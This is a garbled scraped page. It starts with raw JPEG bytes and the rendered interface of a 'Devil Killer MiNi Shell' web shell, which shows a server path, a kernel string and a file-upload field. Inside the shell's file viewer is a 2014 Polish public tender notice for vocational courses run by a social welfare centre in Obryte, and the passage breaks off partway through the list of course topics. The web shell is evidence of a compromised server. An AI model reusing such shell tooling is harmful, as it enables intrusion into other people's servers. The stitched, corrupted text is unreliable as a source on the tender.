JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140414/126458-N-2014.html

<p class="kh_header"><b>Obryte: Organizacja i przeprowadzenie kursów dla Ośrodka Pomocy Społecznej w Obrytem w ramach projektu pt: Razem i Aktywnie  współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 126458 - 2014; data zamieszczenia: 14.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , Obryte 185, 07-215 Obryte, woj. mazowieckie, tel. 29 74 11 105, faks 29 74 11 105.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie kursów dla Ośrodka Pomocy Społecznej w Obrytem w ramach projektu pt: Razem i Aktywnie  współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PROGRAM OPERACYJNY - KAPITAŁ LUDZKI - RAZEM i AKTYWNIE
Tytuł projektu - Razem i Aktywnie
Priorytet VII. Promocja integracji społecznej
Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji
Poddziałanie 7.1.1 Programu Operacyjnego Kapitał Ludzki Projekt jest współfinansowany ze środków Europejskiego Funduszu Społecznego.
2.Zamawiający dopuszcza złożenie ofert częściowych. Wykonawca może złożyć w prowadzonym postępowaniu  ofertę na wszystkie części lub  na wybrane części.
3.Zamawiający podzielił zamówienie na 6 części, a mianowicie:
Część I zamówienia
Zadanie 1: Porady psychologiczne dla  11 osób.

Ilość  osób 	11  osób
Ilość godzin dydaktycznych (1 godzina=45min)	80 godzin w tym: 21 godzin z doradztwa zawodowego ( dla 7 osób po 3 godz.) i 59 godzin zajęć warsztatów psychologicznych ( dla 11 osób po 5 godz, warsztatów indywidualnych oraz 4 godz. zajęć grupowych).
Dojazd do miejsca realizacji kursu	Cena dojazdu beneficjentów do miejsca realizacji kursu powinna być wkalkulowana w cenę ofertową
Termin zajęć:V-2014  do VII-2014r.
Program powinien zawierać wskazane poniżej minimum
programowe	
Budowanie poczucia własnej wartości: 
a) Czym jest poczucie własnej wartości. 
b) Wpływ samooceny na nasze życie. 
c) Sposoby na podniesienie poczucia własnej wartości. 
d) Wzmocnienie wiary we własne możliwości. 
Kształtowanie postawy asertywnej: 
a) Czym jest asertywność. 
b) Asertywne przyjmowanie ocen.
c) Przyjęcie aktywnej postawy w pokonywaniu życiowych trudności. 
Efektywna komunikacja: 
a) Charakterystyka procesu komunikacji. 
b) Techniki i metody efektywnej komunikacji w relacjach i kontaktach międzyludzkich. 
c) Komunikacja werbalna i niewerbalna. 
d) Diagnoza swojego stylu komunikacji. 
e) Sztuka słuchania i analizowania wypowiedzi. 
f) Komunikacja asertywna. 
Naukę radzenie sobie ze stresem: 
a) Mechanizm oddziaływania stresu na organizm. 
b) Uświadomienie uczestnikom indywidualnej podatności i odporności na stres. 
c) Odporność i radzenie sobie ze stresem. 
d) Sposoby optymalnego reagowania na bierność i agresję. 
Doradztwo zawodowe:
a) udzielaniu niezbędnych informacji o zawodach, rynku pracy oraz      możliwościach kształcenia i szkolenia,
b) udzielaniu pomocy w formie indywidualnych i grupowych porad zawodowych,
c) określaniu predyspozycji zawodowych,
Materiały szkoleniowe	Każdy uczestnik kursu musi mieć zapewnione przez Wykonawcę wszystkie niezbędne materiały i narzędzia do odbycia kursu (wszystkie materiały dla beneficjentów muszą zawierać logotypy) oraz musi otrzymać na własność: program kursu i harmonogram zajęć, materiały szkoleniowe zgodne z tematyką kursu (jeden komplet dla Zamawiającego na potrzeby dokumentacji projektowej) oraz materiały biurowe (teczka papierowa formatu A4, zeszyt i długopis)
Usługa gastronomiczna	Wykonawca musi zapewnić podczas zajęć teoretycznych i praktycznych  na kursie barek kawowy dla każdego uczestnika kursu zawodowego. 
Część II zamówienia
ZADANIE 1. Obsługa kasy fiskalnej + obsługa komputera z elementami komputerowego wspierania firmy.
Ilość osób	2 osoby
Ilość godzin dydaktycznych (1 godzina=45min)	80 godzin w tym: 20 godzin zajęć teoretycznych i 60 godzin zajęć
praktycznych.
30 godzin kasy fiskalnej
50 godzin obsługi komputera
Dojazd do miejsca realizacji kursu	Cena dojazdu beneficjentów do miejsca realizacji kursu powinna być
wkalkulowana w cenę ofertową
Termin zajęć:V-2014  do VIII-2014r.
Program powinien zawierać
wskazane poniżej minimum programowe
Kasa fiskalna
1. Znaczenie i funkcje kasy fiskalnej
2. Wygląd kasy i opis klawiatury
3. Uruchomienie kasy i wymiana papieru
4. Zasady sprzedaży
5.Sporzadzanie raportów, faktur, rachunku
6.Obsługa programu do fakturowania
7. Zajęcia praktyczne na kasach fiskalnych
Obsługa komputera
1. Obsługa oprzyrządowania komputerowego.
-budowa komputera, prawidłowe uruchamianie i wyłączanie
komputera,
-urządzenia peryferyjne,
-typy drukarek,
-zastosowanie skanera,
-porty we/wy, sposoby podłączenia urządzeń peryferyjnych.
2. System operacyjny Windows.
-funkcje systemu,
-funkcje pulpitu Windows,
-uruchamianie programów,
-programy instalowane podczas systemu operacyjnego,
-opis panelu sterowania,
-przeglądanie zasobów komputera.
3. Administrowanie danymi.
-operacje na plikach i folderach,
-tworzenie oraz kasowanie, folderów, plików,
-kopiowanie, przenoszenie, wklejanie plików, folderów,
-kosz systemowy.
4. Edytor tekstu (Microsoft Word).
-zastosowanie i funkcje programu,
-elementy okna programu,
-wpisywanie i edycja tekstu,
-wstawianie grafiki, tabel, symboli do dokumentu,
-formatowanie dokumentu (czcionki, rozmiaru, koloru, akapitów,
tabulatorów),
-opcje oraz drukowanie dokumentów.
5. Arkusz kalkulacyjny excel
-zastosowanie oraz funkcje programu,
-poruszanie się po arkuszu,
-wprowadzanie i zmiana danych,
-wykonywanie obliczeń, tworzenie wykresów,
-drukowanie arkusza.
6. Internet, poczta elektroniczna, komunikatory internetowe.
-umiejętność korzystania z przeglądarek internetowych IE,
Firefox, Opera),
-wyszukiwanie danych w globalnej sieci,
-poczta elektroniczna: m. in. Outlook, zakładanie oraz
korzystanie z konta e-mail (wysyłanie i odbieranie
korespondencji),
-ogólna wiedza nt: komunikatorów internetowych (zakładanie
kont, komunikacja, itp.).
Programy użytkowe w firmie:
-zasady działania i pracy z programami użytkowymi firmy, 
-ćwiczenia na programach użytkowych wspomagających pracę firmy.
Materiały szkoleniowe	Każdy uczestnik kursu musi mieć zapewnione przez Wykonawcę wszystkie niezbędne materiały i narzędzia do odbycia kursu (wszystkie materiały dla beneficjentów muszą zawierać logotypy) oraz musi otrzymać na własność: program kursu i harmonogram zajęć, materiały szkoleniowe zgodne z tematyką kursu (jeden komplet dla Zamawiającego na potrzeby dokumentacji projektowej) oraz materiały biurowe (teczka papierowa formatu A4, zeszyt i długopis)
Usługa gastronomiczna	Wykonawca musi zapewnić podczas zajęć teoretycznych i praktycznych  na kursie barek kawowy oraz obiad jednodaniowy dla każdego uczestnika kursu zawodowego. 
Część III zamówienia
Zadanie 1: Fryzjer z elementami wizażu 
Ilość osób	4  osoby
Ilość godzin dydaktycznych - teoretycznych i praktycznych (1 godzina=45min)	200 godz.  dla każdego uczestnika projektu 
(160 godzin kurs fryzjerstwa i 40 godz. kurs wizażu)
Dojazd do miejsca realizacji kursu
Cena dojazdu beneficjentów do miejsca realizacji kursu powinna być wkalkulowana w cenę ofertową
Termin zajęć:V-2014 do  VIII-2014r.
Program powinien zawierać
wskazane poniżej minimum programowe	
Kurs fryzjerstwa
Nowoczesne techniki strzyżenia  
a)podstawowe linie fryzury: profile, symetrie , asymetrie,
b)typy i style fryzur,
c)geometryczne elementy stylizacji,
d)podział głowy na sekcje
bezpieczeństwo i higiena pracy,
a)organizacja pracy w salonie fryzjerskim,
b)zasady bhp, dezynfekcja i sterylizacja,
anatomia,
a)rodzaje włosów - właściwości,
b)diagnoza stanu włosów i skóry głowy
c)budowa wewnętrzna włosa, choroby.
technologie fryzjerskie i stylizacja,
a)cięcie na tempo
b)punktowanie,
c)strzyżenie niestopniowane
d)separowanie, pikowanie, cieniowanie
e)zdejmowanie objętości z końcówek ( sleading, efilage),
f)strzyżenie męskie, strzyżenie maszynką elektryczną.
koki i fryzury ślubne, upięcia, warkocze i fantazyjne upięcia z włosów długich i krótkich.
techniki modelowania włosów (modelowanie, suszenie bez użycia szczotki),
a)modelowanie tradycyjne, modelowanie na prosto,
b)nawijanie włosów na wałki,
trwała ondulacja (rodzaje preparatów do trwałej ondulacji, techniki nawijania włosów, przeprowadzenie zabiegu ondulacji, ondulacja częściowa i ondulacja końcówek i odrostów)
farbowanie włosów-balejage 
a)analiza kolorystyczna, kolory podstawowe, pochodne, dopełniające,
b) omówienie preparatów do koloryzacji 
c)utlenianie, tonowanie, farbowanie, odbarwianie włosa,
d)rozjaśnianie, przyciemnianie i neutralizacja włosów.
e)Techniki nakładania farb i baleyage (metoda światłocienia, makijaż włosów, flash, refleksy, koloryzacja zmywalna).
Kurs  wizażu:
Omówienie stanowiska pracy wizażysty.
Przygotowanie stanowiska pracy.
Przybory i akcesoria wizażysty.
Zasady dezynfekcji, czyszczenia i konserwacji akcesoriów.
b)Produkty kosmetyczne do makijażu.
Kuferek wizażysty.
c)  Przygotowanie skóry twarzy do makijażu.
d)  Techniczne aspekty makijażu.
Rodzaje kształtu twarzy - korekta.
Kamuflowanie defektów skóry.
Konturowanie oka i korekta brwi.
Techniki trwałego makijażu.
e)  Makijaż dzienny dostosowany do wykonywanego zawodu.
f)makijaż wieczorowy,
g)makijaż do okularów,
h)makijaż zgodny z wiekiem ( makijaż dla 20-latki, 30-latki, 40-latki, makijaż po 50 roku życia),
i) makijaż korekcyjny, techniki kamuflażu
j) Techniki doklejania ozdób do twarzy modela: sztuczne rzęsy, cyrkonie, brokaty.
Aktualne trendy w makijażu.
Materiały szkoleniowe
Każdy uczestnik kursu musi mieć zapewnione przez Wykonawcę
wszystkie niezbędne materiały i narzędzia do odbycia kursu minimum jednego podręcznika tematycznie związanego z  programem  szkoleniowym oraz zapewnienia innych niezbędnych materiałów  do przeprowadzenia zajęć.(wszystkie materiały dla beneficjentów muszą zawierać logotypy) każdy uczestnik kursu  musi otrzymać na własność: program kursu i harmonogram zajęć, materiały szkoleniowe zgodne z tematyką kursu (jeden komplet dla Zamawiającego na potrzeby dokumentacji projektowej) .
Usługa gastronomiczna	Wykonawca musi zapewnić podczas zajęć teoretycznych i praktycznych  na kursie barek kawowy oraz obiad jednodaniowy dla każdego uczestnika kursu zawodowego. 

Część IV zamówienia
Zadanie 1: Prawo jazdy kat. B
Ilość osób:2 osoby
Ilość godzin dydaktycznych - teoretycznych i praktycznych
(1 godzina=45min) 65  godzin na jednego uczestnika projektu
Dojazd do miejsca realizacji kursu	Cena dojazdu beneficjentów do miejsca realizacji kursu powinna być
wkalkulowana w cenę ofertową
Termin zajęć:V- 2014r. do VIII- 2014 r.
Program powinien zawierać wskazane poniżej minimum programowe
Program szkolenia teoretycznego
-Budowa, obsługa i eksploatacja samochodu osobowego
-Ogólne zasady poruszania się samochodem po drodze:
zachowanie ostrożności i właściwej postawy w stosunku do innych uczestników ruchu drogowego
-Zasady zachowania bezpiecznych odległości między pojazdami
-Środki wpływające na percepcję i szybkość reakcji (alkohol,
narkotyki, leki), wpływ zmęczenia i stanu emocjonalnego na
zachowanie kierowcy
-Ocena warunków na drodze - warunki atmosferyczne,
widoczność, nawierzchnia, bezpieczna jazda samochodem w różnych warunkach
-Bezpieczne przewożenie pasażerów dorosłych i dzieci
-Znaki drogowe
-Ruszanie, włączanie się do ruchu, zatrzymanie, postój
-Manewry (wyprzedzanie, omijanie, wymijanie, zmiana pasa ruchu)
-Skrzyżowania, ronda, ruch kierowany
-Używanie świateł pojazdu
-Dokumentacja pojazdu, kontrola drogowa
-Udzielanie pierwszej pomocy
-Zasady postępowania w razie uczestniczenia w wypadku lub kolizji drogowej
-Błędy najczęściej popełniane przez kierowców
-Przygotowanie do egzaminu teoretycznego
-Egzamin wewnętrzny
Program szkolenia praktycznego
-Budowa i obsługa samochodu
-Przygotowanie do jazdy, ruszanie, zatrzymanie, zmiana biegów
-Zmiana kierunku jazdy, cofanie
-Obsługa świateł
-Plac manewrowy - ćwiczenie umiejętności manewrowania pojazdem
-Jazda w terenie (dostosowanie prędkości do warunków na drodze, hamowanie awaryjne, bieg 5 i 6)
-Jazda w ruchu ulicznym (pasy ruchu, skrzyżowania, ronda, obserwowanie i przewidywanie działań innych uczestników
ruchu)
-Manewry w ruchu ulicznym (wyprzedzanie, omijanie, wymijanie, parkowanie)
-Jazda sportowa (wychodzenie z poślizgu, ostre wchodzenie w zakręty)
-Jazda z nawigacją
-Stacja benzynowa (tankowanie benzyny, oleju napędowego, gazu)
-Stacja kontroli pojazdów
-Czynności kontrolne na drodze
-Awaria na drodze (diagnostyka, zmiana koła, uzupełnienie płynów eksploatacyjnych)
-Plac manewrowy - przygotowanie do egzaminu
-Trasy egzaminacyjne - przygotowanie do egzaminu
-Egzamin wewnętrzny
Materiały szkoleniowe
Każdy uczestnik kursu musi mieć zapewnione przez Wykonawcę wszystkie niezbędne materiały i narzędzia do odbycia kursu (wszystkie materiały dla beneficjentów muszą zawierać logotypy) oraz musi otrzymać na własność: program kursu i harmonogram zajęć, materiały szkoleniowe zgodne z tematyką kursu (jeden komplet dla Zamawiającego na potrzeby dokumentacji projektowej) oraz materiały
biurowe (teczka papierowa formatu A4, zeszyt i długopis)
Usługa gastronomiczna	Wykonawca musi zapewnić podczas zajęć teoretycznych na kursie barek kawowy oraz obiad jednodaniowy dla każdego uczestnika kursu zawodowego. 
Część V zamówienia
Zadanie 1:  Operator wózków jezdniowych z obsługą i wymianą butli gazowych.
Ilość osób 4  osoby
Ilość godzin dydaktycznych
(1 godzina= 45min) Łączna liczba godzin szkolenia: 67 godzin zajęć dla każdego uczestnika projektu (godzina kursu liczy 60 minut i obejmuje zajęcia dydaktyczne liczące 45 minut oraz przerwę liczącą 15 minut)
Dojazd do miejsca realizacji kursu.Cena dojazdu beneficjenta do miejsca realizacji kursu powinna być wkalkulowana w cenę ofertową
Termin zajęć:V- 2014r. do VIII -2014 r.
Program powinien zawierać wskazane poniżej
minimum programowe typy stosowanych wózków jezdniowych,
budowa wózków jezdniowych,
czynności kierowcy przy obsłudze wózków przed podjęciem pracy i po pracy wózkami,
czynności kierowcy w czasie pracy wózkami,
wiadomości z zakresu ładunkoznawstwa,
wiadomości z zakresu BHP,
wiadomości o dozorze technicznym,
obsługa i wymiana butli gazowych w wózkach zasilanych gazem propan - butan,
praktyczna nauka jazdy wózkami widłowymi.
Zaświadczenia lub certyfikaty

Kurs kończy się egzaminem Urzędu Dozoru Technicznego i wydaniem zaświadczenia o ukończeniu kursu. Zaświadczenie musi być zgodne z rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006r.w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006r. Nr 31 poz. 216). Wykonawca wyda uczestnikowi, który ukończy szkolenie zaświadczenie informujące o uczestnictwie w szkoleniu współfinansowanym ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, oznakowanych zgodnie
z wytycznymi dotyczącymi oznakowywania projektów w ramach POKL 2007-2013. Treść zaświadczenia zostanie uzgodniona z Zamawiającym,
Materiały szkoleniowe. Organizator zabezpiecza w ramach kursu: niezbędne środki i materiały dydaktyczne, niezbędny sprzęt wykorzystywany w trakcie kursu w tym wózek widłowy certyfikowany przez Urząd Dozoru Technicznego, realizację kursu według przygotowanego programu przedłożonego w ofercie, wykwalifikowaną i doświadczoną kadrę, badanie lekarskie upoważniające do wykonywanie zawodu operatora wózków jezdniowych, ubezpieczenie od następstw nieszczęśliwych wypadków uczestników kursu. Wszystkie materiały dla beneficjentów muszą zawierać logotypy) każdy uczestnik musi otrzymać na własność: program kursu i harmonogram zajęć, materiały szkoleniowe zgodne z tematyką kursu (jeden komplet dla Zamawiającego na potrzeby dokumentacji projektowej) oraz materiały biurowe (teczka papierowa formatu A4, zeszyt i długopis)
Warunki szkolenia
Wykonawca zapewnia salę do szkoleń. Wykonawca prowadzi dokumentację z  zajęć w tym : dziennik zajęć, listy obecności uczestnika szkolenia, listy potwierdzającej korzystanie uczestnika szkolenia z posiłków, listy potwierdzającej odbiór materiałów dydaktycznych i piśmienniczych, list
potwierdzającej odbiór zaświadczeń o ukończeniu i uczestnictwie w szkoleniu,
Wykonawca  prowadzi zajęcia zgodnie z przepisami bhp w tym zakresie,
Wykonawca zapewni uczestnikom kursu odzież ochronną, jeżeli konieczność taka wynika z obowiązujących przepisów bhp.
Usługa gastronomiczna.Wykonawca musi zapewnić podczas zajęć teoretycznych i praktycznych na kursie barek kawowy oraz obiad jednodaniowy dla każdego uczestnika kursu zawodowego.
Ubezpieczenie Wykonawca ubezpieczy uczestnika  na czas trwania szkolenia od następstw nieszczęśliwych wypadków (NNW).
Zadanie 2 :Operator koparko-ładowarki  
Ilość osób:2 osoby
Ilość godzin dydaktycznych
(1 godzina=45min) Łączna liczba godzin szkolenia: 176 godz. dla jednego uczestnika szkolenia (godzina kursu liczy 60 minut i obejmuje zajęcia dydaktyczne liczące 45 minut oraz przerwę liczącą 15 minut)
Termin zajęć:V- 2014r. do VIII -2014 r.
Dojazd do miejsca realizacji kursu. 
Cena dojazdu beneficjentów do miejsca realizacji kursu powinna być wkalkulowana w cenę ofertową
Program powinien zawierać
wskazane poniżej minimum
programowe
Program szkolenia powinien obejmować następujące zagadnienia:
1) użytkowanie eksploatacyjne,
2) dokumentacja techniczna,
3) bezpieczeństwo i higiena pracy,
4) podstawy elektrotechniki,
5) silniki spalinowe,
6) elementy hydrauliki,
7) budowa koparko-ładowarki,
8) technologia robót,
9) zajęcia praktyczne.
Warunki szkolenia
Wykonawca zapewnia salę do szkoleń. Wykonawca prowadzi dokumentację z  zajęć w tym : dziennika zajęć, listy obecności uczestnika szkolenia, listy potwierdzającej korzystanie uczestnika szkolenia z posiłków, listy potwierdzającej odbiór materiałów dydaktycznych i piśmienniczych, listy potwierdzającej odbiór zaświadczeń o ukończeniu i uczestnictwie w szkoleniu,
Wykonawca  prowadzi zajęcia zgodnie z przepisami bhp w tym zakresie. Wykonawca zapewni sprzęt gwarantujący wykonanie usługi w najwyższym standardzie.
Wykonawca zapewni uczestnikom kursu odzież ochronną, jeżeli konieczność taka wynika z obowiązujących przepisów bhp. 
Materiały szkoleniowe	Każdy uczestnik kursu musi mieć zapewnione przez Wykonawcę wszystkie niezbędne materiały i narzędzia do odbycia kursu (wszystkie materiały dla beneficjentów muszą zawierać logotypy) oraz musi otrzymać na własność: program kursu i harmonogram zajęć, materiały szkoleniowe zgodne z tematyką kursu (jeden komplet dla Zamawiającego na potrzeby dokumentacji projektowej) oraz materiały biurowe (teczka papierowa formatu A4, zeszyt i długopis)
Usługa gastronomiczna	Wykonawca musi zapewnić podczas zajęć teoretycznych i praktycznych na kursie barek kawowy oraz obiad jednodaniowy dla każdego uczestnika kursu zawodowego.
Ubezpieczenie Wykonawca ubezpieczy uczestnika  na czas trwania szkolenia od następstw nieszczęśliwych wypadków (NNW).
Część VI zamówienia
Zadanie 1. Kurs ADR - podstawowy wszystkich klas, kurs specjalistyczny w zakresie przewozu  w cysternach,  kurs specjalistyczny w zakresie przewozu materiałów wybuchowych klasy 1, kurs specjalistyczny w zakresie przewozu materiałów promieniotwórczych klasy 7.
Ilość osób 	1 osoba
Ilość godzin dydaktycznych
(1 godzina= 45min) Łączna liczba godzin szkolenia: 56 godzin zajęć (godzina kursu liczy 60 minut i obejmuje zajęcia dydaktyczne liczące 45 minut oraz przerwę liczącą 15 minut)
Dojazd do miejsca realizacji kursu	Cena dojazdu beneficjenta do miejsca realizacji kursu powinna być wkalkulowana w cenę ofertową
Termin zajęć:V- 2014r. do VIII -2014 r.
Warunki szkolenia
Wykonawca zapewnia salę do szkoleń. Wykonawca prowadzi dokumentację z zajęć w tym : dziennika zajęć, listy obecności uczestnika szkolenia, listy potwierdzającej korzystanie uczestnika szkolenia z posiłków, listy potwierdzającej odbiór materiałów dydaktycznych i piśmienniczych, listy potwierdzającej odbiór zaświadczeń o ukończeniu i uczestnictwie w szkoleniu.
Wykonawca  prowadzi zajęcia zgodnie z przepisami bhp w tym zakresie.
Program
powinien zawierać
wskazane poniżej
minimum programowe	Kurs ADR podstawowy w zakresie przewozu towarów niebezpiecznych w wymiarze 24 godz.
Wymagania ogólne dotyczące przewozu towarów niebezpiecznych
Główne rodzaje zagrożeń
Informacje na temat ochrony środowiska i kontroli przewozu odpadów
Działania zapobiegawcze i środki bezpieczeństwa właściwe dla różnych rodzajów zagrożeń
Czynności, które należy podjąć po zaistnieniu wypadku, w szczególności w zakresie pierwszej pomocy, bezpieczeństwa ruchu drogowego, używania sprzętu ochronnego, w tym gaśniczego oraz środków ochrony indywidualnej
Oznakowania oraz umieszczania nalepek ostrzegawczych i tablic barwy pomarańczowej
Obowiązki kierowcy związane z przewozem towarów niebezpiecznych
Przeznaczenie i sposób działania wyposażenia technicznego pojazdów
Zakazy ładowania razem różnych towarów niebezpiecznych
Środki ostrożności, które powinny być podjęte podczas załadunku i rozładunku towarów niebezpiecznych
Informacje na temat odpowiedzialności cywilnej, administracyjnej i karnej
Informacje na temat realizacji transportu kombinowanego
Manipulowanie sztukami przesyłki oraz ich układanie
Ograniczenia przejazdu przez tunele oraz postępowanie kierowcy podczas takiego przejazdu, w szczególności zapobieganie wypadkom, bezpieczeństwo, postępowanie w przypadku pożaru lub innych zagrożeń
Ochrona towarów niebezpiecznych
Uwaga!
Zgodnie z § 8 ust. 4 rozporządzenia MTBiGM z dn. 29.05.2012 r. w sprawie prowadzenia kursów z zakresu przewozu towarów niebezpiecznych w celu przeprowadzenia ćwiczeń praktycznych minimalny czas trwania kursu przedłuża się o dodatkową godzinę lekcyjną na każde pięć osób uczestniczących w kursie.
Kurs ADR w zakresie przewozu towarów niebezpiecznych w cysternach 16 godz.: 
zachowanie się pojazdów na drodze, z uwzględnieniem przemieszczania się ładunku, 
szczególne wymagania dotyczące pojazdów, 
ogólne wiadomości na temat systemów napełniania i opróżniania cystern, 
 przepisy szczególne dotyczące używania pojazdów, 
świadectwo dopuszczenia pojazdów do przewozu niektórych towarów niebezpiecznych, 
zasady umieszczania nalepek ostrzegawczych na cysternach, 
zasady znakowania cystern tablicami pomarańczowymi.
Uwaga!
Zgodnie z § 8 ust. 4 rozporządzenia MTBiGM z dn. 29.05.2012 r. w sprawie prowadzenia kursów z zakresu przewozu towarów niebezpiecznych  w celu przeprowadzenia ćwiczeń praktycznych minimalny czas trwania kursu przedłuża się o dodatkową godzinę lekcyjną na każde pięć osób uczestniczących w kursie.
Szkolenie specjalistyczne  ADR dla klasy 1 w wymiarze 8 godz
Specyficzne zagrożenia stwarzane przez materiały i przedmioty wybuchowe, w tym wyroby pirotechniczne
Szczególne wymagania, w tym zakazy pakowania i ładowania razem różnych materiałów i przedmiotów klasy 1
